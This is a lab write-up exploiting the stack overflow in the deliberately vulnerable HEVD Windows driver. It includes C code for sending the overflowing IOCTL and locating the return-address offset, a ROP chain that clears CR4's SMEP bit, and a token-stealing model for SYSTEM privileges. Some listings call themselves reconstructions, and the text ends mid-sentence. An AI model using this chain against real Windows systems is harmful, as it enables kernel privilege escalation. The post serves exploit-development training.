This post is a writeup of a simple stack buffer overflow in the HackSys Extreme Vulnerable Driver (HEVD). We assume that you already have an environment set up to follow along. If you don't, this post uses:
- Windows 10 Pro x64 RS1
- HEVD 3.00
If you are not sure how to set up a kernel debugging environment, there are plenty of posts online that describe the process; we will not cover it here.
Reversing the Driver
The first challenge we need to tackle is finding the IRP handler, which takes the form of a function containing a huge switch statement. Since HEVD is a relatively small driver, it is quite easy to find. In larger drivers this can of course be trickier, but we won't cover that here.
Locating the IRP Handler
The IRP handler in HEVDv3 is located at sub_140085078 and, as stated above, the function is a large switch statement that eventually leads to all of the different IOCTL handlers. The below image shows the graph overview of the IRP handler. We will refer to this handler function as IrpDeviceIoCtlHandler from this point onwards.
Now that we've located the IRP handler we can begin reversing.
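For orientation, each case in that switch corresponds to one IOCTL code. Below is a minimal sketch of how such a code breaks down, assuming the standard CTL_CODE bit layout from the Windows headers. The names make_ioctl, decode_ioctl and ioctl_fields are hypothetical and exist only for this illustration. The value 0x222003 does not come from this post either; it is the code that, to my knowledge, HEVD's public source assigns to the stack overflow handler (device type 0x22, function 0x800, METHOD_NEITHER).

```c
#include <stdint.h>

/* Fields packed into a Windows IOCTL code (CTL_CODE layout). */
struct ioctl_fields {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14 */
    uint32_t function;    /* bits 13..2  */
    uint32_t method;      /* bits 1..0   */
};

/* Same arithmetic as the CTL_CODE macro. */
uint32_t make_ioctl(uint32_t device_type, uint32_t function,
                    uint32_t method, uint32_t access)
{
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* Split an IOCTL code back into its four fields. */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xFFF;
    f.method      = code & 0x3;
    return f;
}
```

When reversing an unknown driver, decoding the constants compared in the switch this way is a quick sanity check that you are really looking at the IOCTL dispatcher.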
Locating the IOCTL Handler
In a real-world scenario we would have to reverse each of the functions the switch dispatches to in order to find a vulnerable one. In this case we know they're all vulnerable, and I've already found the routine we are targeting in this post by doing a string search for "Buffer overflow".
loc_14008522F is the entry point to our target function, which is shown in the below figure.
In the above image I've already renamed the IOCTL handler routine as BufferOverflowStackIoctlHandler (or sub_140086594 if you're following along). Let's open the function and look at it in some more detail.
The target function is quite small because it calls into the vulnerable function, labelled as TriggerBufferOverflowStack in the above image (or sub_1400865B4 if you're following along).
Reversing the Vulnerable Function
Finally we've arrived at the vulnerable function and can begin looking for the vulnerability. The below code block is the decompilation of the vulnerable function. It's been cleaned up for readability.
- There is no size check on the value of a2, and since this value is controlled by us we can specify a size greater than 2048.
- This is a statically allocated buffer of 2048 bytes in kernel mode. The size here is important.
The function itself is extremely simple. We have a stack-allocated buffer, Dst, which is 2048 bytes in size. Then a ProbeForRead is performed; this function checks that the given buffer actually resides in the user-mode portion of the address space and is correctly aligned. So far so good.
Moving down the function we can see an RtlCopyMemory call, and the bright-eyed among you might notice the issue straight away. If you're unfamiliar with it, RtlCopyMemory does exactly what you imagine: it copies a buffer from a source block to a destination block.
We can see that our stack-allocated buffer Dst is used as the destination, the source is Address, which is our user-mode buffer, and the number of bytes to copy is specified by a2. However, at no point is there a check on whether the contents of Address fit inside Dst, so if we make our user-mode buffer larger than 2048 bytes we have a classic stack buffer overflow. We can confirm the same story in the assembly view.
To summarise, the vulnerability is a classic stack buffer overflow caused by a missing size check on a copy from a user-mode buffer to a kernel-mode buffer. The vulnerable function has a stack-allocated buffer of 2048 bytes, so as long as we can provide a buffer larger than 2048 bytes we will be able to overflow it and gain control of the stack.
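To make the missing check concrete, here is a small user-mode model of the copy. It is not the driver's code: copy_with_size_check is a hypothetical name, and memcpy stands in for RtlCopyMemory. The vulnerable routine behaves like this function with the size comparison removed.

```c
#include <stddef.h>
#include <string.h>

#define KERNEL_BUFFER_SIZE 2048 /* size of the stack buffer in the post */

/* Returns 0 on success, -1 if the request would overflow dst.
 * The vulnerable routine performs the copy without this check. */
int copy_with_size_check(unsigned char *dst, size_t dst_size,
                         const unsigned char *src, size_t size)
{
    if (size > dst_size) {
        return -1; /* reject instead of writing past the buffer */
    }
    memcpy(dst, src, size);
    return 0;
}
```

With the check in place a 2049-byte request is rejected. Without it, every byte past 2048 lands on whatever the compiler placed after the buffer on the stack, which eventually includes the saved return address.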
Now that we've found the vulnerability statically, it's time to prove that it is exploitable. To do that we're going to use WinDbg to step through the vulnerable function and verify that we can send a buffer greater than 2048 bytes and get stack control as a result.
Interacting with the Driver
In order to begin dynamic analysis we'll need to build a way of interacting with the driver and sending it IOCTLs. You can use any language to do this, but we're going to use C because:
- It is really nice to use when working with Windows
- Python3 ctypes absolutely sucks for this kind of thing
- Exploit portability
The below code block is a very simple C program to interact with the driver. If you're unfamiliar with the Windows API, the two most important sections of code to be aware of are
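A minimal sketch of such a program follows. It is an assumption-laden reconstruction, not the original listing: the device name and the IOCTL value 0x222003 are taken from HEVD's public source rather than from this post, and make_filler_buffer and send_to_driver are hypothetical helper names. The Windows-specific part is guarded so the portable helper still compiles elsewhere; the two API calls it relies on are CreateFileA, to open a handle to the device, and DeviceIoControl, to send the buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Assumed values: taken from HEVD's public source, not from this post. */
#define HEVD_DEVICE_NAME "\\\\.\\HackSysExtremeVulnerableDriver"
#define HEVD_IOCTL_STACK_OVERFLOW 0x222003u

/* Allocate a buffer of `size` bytes filled with 'A'. Caller frees it. */
unsigned char *make_filler_buffer(size_t size)
{
    unsigned char *buf = malloc(size);
    if (buf != NULL) {
        memset(buf, 'A', size);
    }
    return buf;
}

#ifdef _WIN32
/* Open the device and send one IOCTL. Returns 0 on success, -1 on failure. */
int send_to_driver(const unsigned char *buf, DWORD size)
{
    DWORD bytes_returned = 0;
    HANDLE device = CreateFileA(HEVD_DEVICE_NAME,
                                GENERIC_READ | GENERIC_WRITE,
                                0, NULL, OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateFileA failed: %lu\n", GetLastError());
        return -1;
    }

    BOOL ok = DeviceIoControl(device, HEVD_IOCTL_STACK_OVERFLOW,
                              (LPVOID)buf, size, NULL, 0,
                              &bytes_returned, NULL);
    CloseHandle(device);
    return ok ? 0 : -1;
}
#endif
```

Starting with a buffer of exactly 2048 bytes is a safe first test: it fills the kernel buffer without overflowing it, so you can confirm the IOCTL reaches the handler before deliberately crashing the target.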
For the purposes of debugging and explaining, I imported the HEVD symbol file into WinDbg so that we can refer to functions by name rather than by raw addresses, which change under ASLR.
If you're following along I'd recommend that you do the same.
Verifying Input and Size
Remember, in order to cause a buffer overflow we need to overflow the stack-allocated buffer of 2048 bytes, so we need to confirm that we can supply a size larger than this. If you recall, the function TriggerBufferOverflowStack takes two arguments: a user-mode address where our buffer is stored and a size argument. If we set a breakpoint on BufferOverflowStackIoctlHandler we can step through to the call to the vulnerable function and check the validity of our arguments.
The above figure shows clearly that we do have complete control of these arguments. The first instruction of interest is HEVD!BufferOverflowStackIoctlHandler+0x4 where our user-mode address is moved from rcx. The next instruction of interest is immediately after at HEVD!BufferOverflowStackIoctlHandler+0xd where the size of our user-mode buffer is moved from edx. We then dump those arguments to verify.
Now that we've verified that we control both arguments to the vulnerable function unconditionally, we can move forward with gaining control of the return address.
Gaining Control of the Return Address
To figure out where we gain control we can use a number of methods, such as a cyclic pattern.
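As a rough sketch of the cyclic pattern approach, the code below generates an "Aa0Aa1Aa2..." style pattern (one common scheme, not necessarily the one used for this post) and searches it for the bytes that ended up in the return address. cyclic_fill and cyclic_find are hypothetical names for this illustration.

```c
#include <stddef.h>
#include <string.h>

/* Fill out[0..len) with an "Aa0Aa1Aa2..." style pattern.
 * The pattern repeats after 26 * 26 * 10 * 3 = 20280 bytes. */
void cyclic_fill(unsigned char *out, size_t len)
{
    size_t i = 0;
    while (i < len) {
        for (char u = 'A'; u <= 'Z' && i < len; u++) {
            for (char l = 'a'; l <= 'z' && i < len; l++) {
                for (char d = '0'; d <= '9' && i < len; d++) {
                    const char triple[3] = { u, l, d };
                    for (int k = 0; k < 3 && i < len; k++) {
                        out[i++] = (unsigned char)triple[k];
                    }
                }
            }
        }
    }
}

/* Return the offset of the first occurrence of needle in the pattern,
 * or -1 if it does not occur. */
long cyclic_find(const unsigned char *pattern, size_t len,
                 const unsigned char *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > len) {
        return -1;
    }
    for (size_t i = 0; i + needle_len <= len; i++) {
        if (memcmp(pattern + i, needle, needle_len) == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

In practice you send the pattern as the user-mode buffer, let the target crash, read the 8 bytes at the top of the stack at the faulting ret in WinDbg, and pass them (in memory order) to cyclic_find to recover the offset.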
Based on the above we see that we gain control of the return address at 2072 bytes. We'll update our code accordingly.
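The resulting layout can be sketched as follows: 2072 filler bytes followed by the 8-byte value that will overwrite the return address. build_overflow_buffer is a hypothetical helper name, and the marker value you pass in is up to you.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define RET_OFFSET 2072 /* offset of the saved return address, from the post */

/* Build a buffer of RET_OFFSET filler bytes followed by an 8-byte return
 * address. Writes the total size to *out_size. Caller frees the buffer. */
unsigned char *build_overflow_buffer(uint64_t ret_addr, size_t *out_size)
{
    size_t size = RET_OFFSET + sizeof(ret_addr);
    unsigned char *buf = malloc(size);
    if (buf == NULL) {
        return NULL;
    }
    memset(buf, 'A', RET_OFFSET);
    /* memcpy stores the value in host byte order (little-endian on x64). */
    memcpy(buf + RET_OFFSET, &ret_addr, sizeof(ret_addr));
    *out_size = size;
    return buf;
}
```

Using a recognisable marker such as 0x4242424242424242 for the return address makes it obvious in the debugger whether the offset is right.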
We can run our POC again and verify that we gain control of the return address, as shown below.
Perfect, we now have control of the return address. However, we've not won yet: there are exploit mitigations that need to be taken into consideration.
The first mitigation we need to circumvent is Supervisor Mode Execution Prevention (SMEP). This is a hardware mitigation that prevents code residing in user-mode pages from being executed in ring 0. In essence, it blocks EoPs that rely on executing a user-mode payload directly.
There are a few ways to bypass SMEP, but the main one (and the one we're going to use) is to construct a ROP chain that clears bit 20 of CR4, the SMEP enable bit. Once that bit is cleared SMEP is disabled and we can simply jump to our user-mode payload.
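The bit arithmetic is small enough to check by hand. The sketch below uses hypothetical helper names, and the starting value 0x170678 is only an assumed example of a CR4 value with SMEP enabled; read the real value from your own target in the debugger.

```c
#include <stdint.h>

#define CR4_SMEP_BIT 20 /* zero-indexed bit position of SMEP in CR4 */

/* Returns 1 if the SMEP bit is set in the given CR4 value, else 0. */
int smep_enabled(uint64_t cr4)
{
    return (int)((cr4 >> CR4_SMEP_BIT) & 1);
}

/* Returns the CR4 value with only the SMEP bit cleared. */
uint64_t clear_smep(uint64_t cr4)
{
    return cr4 & ~(1ULL << CR4_SMEP_BIT);
}
```

Clearing bit 20 of the assumed value 0x170678 gives 0x70678, which is the value written to CR4 later in this post.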
In this example we are going to use APIs that are only available at medium (or higher) integrity levels, namely EnumDeviceDrivers. In a lot of EoP cases we will be at low integrity rather than medium; in these cases you'll need a leak to get the base address of kernel modules. 1
First we'll create a new function in our C code called GetKernelBase. The function is fairly simple: it calls EnumDeviceDrivers and takes the first item from the returned array, which is the base address of ntoskrnl.exe. The below code only includes changes.
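A minimal sketch of what GetKernelBase might look like is shown here; it is a reconstruction under assumptions, not the original listing. The array size of 1024 entries is an arbitrary choice, and the non-Windows stub exists only so the snippet compiles elsewhere.

```c
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
#include <psapi.h> /* may require linking against psapi.lib */

/* Return the load address of the first driver reported by
 * EnumDeviceDrivers (ntoskrnl.exe, per the post), or 0 on failure. */
uint64_t GetKernelBase(void)
{
    LPVOID drivers[1024]; /* arbitrary upper bound for this sketch */
    DWORD needed = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &needed) ||
        needed < sizeof(drivers[0])) {
        return 0;
    }
    return (uint64_t)(uintptr_t)drivers[0];
}
#else
/* Non-Windows build: there is nothing to query, so report failure. */
uint64_t GetKernelBase(void)
{
    return 0;
}
#endif
```

From a low integrity process the call does not hand back usable addresses, which is why a separate leak is needed in that situation.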
As you can see, it is very easy to get the base address of the kernel and other drivers provided that you have access to the EnumDeviceDrivers call. But we're not done here: we still need to build our ROP chain to clear bit 20 of the CR4 register.
The ROP chain itself is fairly simple: we need to pop our intended CR4 value into a register and then move the contents of that register into CR4, thus turning off SMEP. To find gadgets we can use a tool such as rp++. In my case I found the below gadgets in
Now that we have our gadgets, we need to update our exploit to place them in the buffer at the point where we control the return address, so that when the function returns we start our ROP chain and disable SMEP.
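The layout of the chain can be sketched like this. The gadget offsets are deliberately left as parameters because they depend on your kernel build; pop_rcx_offset and mov_cr4_offset are hypothetical names for the offsets of a "pop rcx ; ret" gadget and a gadget that moves RCX into CR4 and returns, and write_rop_chain is likewise an illustrative helper rather than the original code.

```c
#include <stdint.h>
#include <string.h>

#define RET_OFFSET 2072        /* offset of the saved return address */
#define CR4_NO_SMEP 0x70678ULL /* CR4 value used in the post */
#define ROP_CHAIN_QWORDS 4

/* Write the four-entry chain at buf + RET_OFFSET:
 *   [pop rcx ; ret] [new CR4 value] [mov cr4, rcx ; ret] [payload address]
 * buf must hold at least RET_OFFSET + 32 bytes. Returns bytes used. */
size_t write_rop_chain(unsigned char *buf, uint64_t kernel_base,
                       uint64_t pop_rcx_offset, uint64_t mov_cr4_offset,
                       uint64_t payload_addr)
{
    const uint64_t chain[ROP_CHAIN_QWORDS] = {
        kernel_base + pop_rcx_offset, /* overwrites the return address */
        CR4_NO_SMEP,                  /* popped into RCX */
        kernel_base + mov_cr4_offset, /* writes RCX into CR4 */
        payload_addr,                 /* user-mode payload runs next */
    };
    memset(buf, 'A', RET_OFFSET);
    memcpy(buf + RET_OFFSET, chain, sizeof(chain));
    return RET_OFFSET + sizeof(chain);
}
```

Each gadget ends in ret, so execution walks down the stack one entry at a time: the first ret lands on the pop, the pop consumes the CR4 value, and the final ret transfers control to the payload with SMEP already off.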
If you're wondering why we chose 0x70678 as the new value for CR4, it is because in binary this value is 1110000011001111000, which leaves bit 20 (the SMEP bit) set to 0. Let's go ahead and trace the execution in a debugger and ensure that bit 20 of CR4 is correctly cleared to disable SMEP.
- Pay attention to the value in RCX here.
- This denotes excluded instructions. It isn't important.
As you can see in the above output from WinDbg, we set a breakpoint on the memcpy and then step through the program until the return. At the return we can clearly see that our pop rcx gadget is executed and the value 70678 is placed in the RCX register. If we continue stepping we then see that value being written into the CR4 register, which bypasses SMEP. All that's left for us to do now is to allocate some space in userland, fill it with shellcode and get a SYSTEM shell.
I'll leave this part for you to do based on whatever build of Windows you're on. I'm on RS1 in this post, so I used a well-known shellcode (got it from here, thanks Conor) which loops over processes, comparing each process's PID against the SYSTEM PID until the SYSTEM process is found.
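The logic of that kind of shellcode can be modelled in plain C. This is only a user-mode illustration of the list walk: mock_process is an invented stand-in for the kernel's per-process structure, whose real field offsets differ between Windows builds, and the final token copy is the usual goal of such a payload rather than something spelled out above.

```c
#include <stddef.h>
#include <stdint.h>

#define SYSTEM_PID 4 /* PID of the SYSTEM process on Windows */

/* Simplified stand-in for the kernel's per-process structure. The real
 * EPROCESS layout differs per build; these fields are illustrative only. */
struct mock_process {
    uint64_t pid;
    uint64_t token;
    struct mock_process *next; /* circular list, like ActiveProcessLinks */
};

/* Walk the list from `current` until the SYSTEM process is found, then copy
 * its token into `current`. Returns 0 on success, -1 if SYSTEM is missing. */
int steal_system_token(struct mock_process *current)
{
    struct mock_process *p = current;
    do {
        if (p->pid == SYSTEM_PID) {
            current->token = p->token;
            return 0;
        }
        p = p->next;
    } while (p != current);
    return -1;
}
```

The real payload does the same walk in assembly using build-specific offsets into EPROCESS, and it must also restore execution cleanly afterwards so the machine does not bugcheck.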
You can find my full exploit below, or scroll down to open it on GitHub. Thanks for reading!
In the future I will publish an article which explains that process in more detail. However in this example we're just going to use